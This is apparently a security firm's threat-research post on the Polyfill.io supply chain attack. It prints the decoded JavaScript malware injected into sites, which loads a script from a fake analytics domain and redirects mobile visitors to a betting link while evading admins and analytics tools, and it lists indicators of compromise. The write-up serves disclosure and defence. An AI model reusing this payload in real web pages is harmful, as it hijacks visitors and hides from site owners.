Polyfill supply chain attack hits 100K+ sites
by Sansec Forensics Team
Published in Threat Research − June 25, 2024
The new Chinese owner of the popular Polyfill JS project injects malware into more than 100 thousand sites.
bootcdn.net, bootcss.com, staticfile.net, staticfile.org, unionadjs.com, xhsbpza.com, union.macoms.la, newcrbpc.com.The polyfill.js is a popular open source library to support older browsers. 100K+ sites embed it using the cdn.polyfill.io domain. Notable users are JSTOR, Intuit and World Economic Forum. However, in February this year, a Chinese company bought the domain and the Github account. Since then, this domain was caught injecting malware on mobile devices via any site that embeds cdn.polyfill.io. Any complaints were quickly removed (archive here) from the Github repository.
The polyfill code is dynamically generated based on the HTTP headers, so multiple attack vectors are likely. Sansec decoded one particular malware (see below) which redirects mobile users to a sports betting site using a fake Google analytics domain (www.googie-anaiytics.com). The code has specific protection against reverse engineering, and only activates on specific mobile devices at specific hours. It also does not activate when it detects an admin user. It also delays execution when a web analytics service is found, presumably to not end up in the stats.
The original polyfill author recommends to not use Polyfill at all, as it is no longer needed by modern browsers anyway. Meanwhile, both Fastly and Cloudflare have put up trustworthy alternatives, if you still need it.
This incident is a typical example of a supply chain attack. To get visibility into the code that your users are loading, we recommend our (free) CSP monitoring service Sansec Watch.
Our eComscan backend scanner has also been updated with polyfill.io detection.
Polyfill malicious payload example
We added some names for readability, however tiaozhuan came from the original malware (which means "jump" in Chinese).
function isPc() {
try {
var _isWin =
navigator.platform == "Win32" || navigator.platform == "Windows",
_isMac =
navigator.platform == "Mac68K" ||
navigator.platform == "MacPPC" ||
navigator.platform == "Macintosh" ||
navigator.platform == "MacIntel";
if (_isMac || _isWin) {
return true;
} else {
return false;
}
} catch (_0x44e1f6) {
return false;
}
}
function vfed_update(_0x5ae1f8) {
_0x5ae1f8 !== "" &&
loadJS(
"https://www.googie-anaiytics.com/html/checkcachehw.js",
function () {
if (usercache == true) {
window.location.href = _0x5ae1f8;
}
}
);
}
function check_tiaozhuan() {
var _isMobile = navigator.userAgent.match(
/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i
);
if (_isMobile) {
var _curHost = window.location.host,
_ref = document.referrer,
_redirectURL = "",
_kuurzaBitGet = "https://kuurza.com/redirect?from=bitget",
_rnd = Math.floor(Math.random() * 100 + 1),
_date = new Date(),
_hours = _date.getHours();
if (
_curHost.indexOf("www.dxtv1.com") !== -1 ||
_curHost.indexOf("www.ys752.com") !== -1
) {
_redirectURL = "https://kuurza.com/redirect?from=bitget";
} else {
if (_curHost.indexOf("shuanshu.com.com") !== -1) {
_redirectURL = "https://kuurza.com/redirect?from=bitget";
} else {
if (_ref.indexOf(".") !== -1 && _ref.indexOf(_curHost) == -1) {
_redirectURL = "https://kuurza.com/redirect?from=bitget";
} else {
if (_hours >= 0 && _hours < 2) {
if (_rnd <= 10) {
_redirectURL = _kuurzaBitGet;
}
} else {
if (_hours >= 2 && _hours < 4) {
_rnd <= 15 && (_redirectURL = _kuurzaBitGet);
} else {
if (_hours >= 4 && _hours < 7) {
_rnd <= 20 && (_redirectURL = _kuurzaBitGet);
} else {
_hours >= 7 && _hours < 8
? _rnd <= 10 && (_redirectURL = _kuurzaBitGet)
: _rnd <= 10 && (_redirectURL = _kuurzaBitGet);
}
}
}
}
}
}
_redirectURL != "" &&
!isPc() &&
document.cookie.indexOf("admin_id") == -1 &&
document.cookie.indexOf("adminlevels") == -1 &&
vfed_update(_redirectURL);
}
}
let _outerPage = document.documentElement.outerHTML,
bdtjfg = _outerPage.indexOf("hm.baidu.com") != -1;
let cnzfg = _outerPage.indexOf(".cnzz.com") != -1,
wolafg = _outerPage.indexOf(".51.la") != -1;
let mattoo = _outerPage.indexOf(".matomo.org") != -1,
aanaly = _outerPage.indexOf(".google-analytics.com") != -1;
let ggmana = _outerPage.indexOf(".googletagmanager.com") != -1,
aplausix = _outerPage.indexOf(".plausible.io") != -1,
statcct = _outerPage.indexOf(".statcounter.com") != -1;
bdtjfg || cnzfg || wolafg || mattoo || aanaly || ggmana || aplausix || statcct
? setTimeout(check_tiaozhuan, 2000)
: check_tiaozhuan();
Indicators of compromise
https://kuurza.com/redirect?from=bitget
https://www.googie-anaiytics.com/html/checkcachehw.js
https://www.googie-anaiytics.com/ga.js
https://cdn.bootcss.com/highlight.js/9.7.0/highlight.min.js
https://union.macoms.la/jquery.min-4.0.2.js
https://newcrbpc.com/redirect?from=bscbc
bootcdn.net
staticfile.net
staticfile.org
unionadjs.com
xhsbpza.com
Read more
In this article
Easy CSP for your store?
Try Sansec Watch! Free, simple and fully integrated. Get PCI compliant alerting with minimal effort.
Sansec WatchScan your store now
for malware & vulnerabilities
eComscan is the most thorough security scanner for Magento, Adobe Commerce, Shopware, WooCommerce and many more.
Learn more
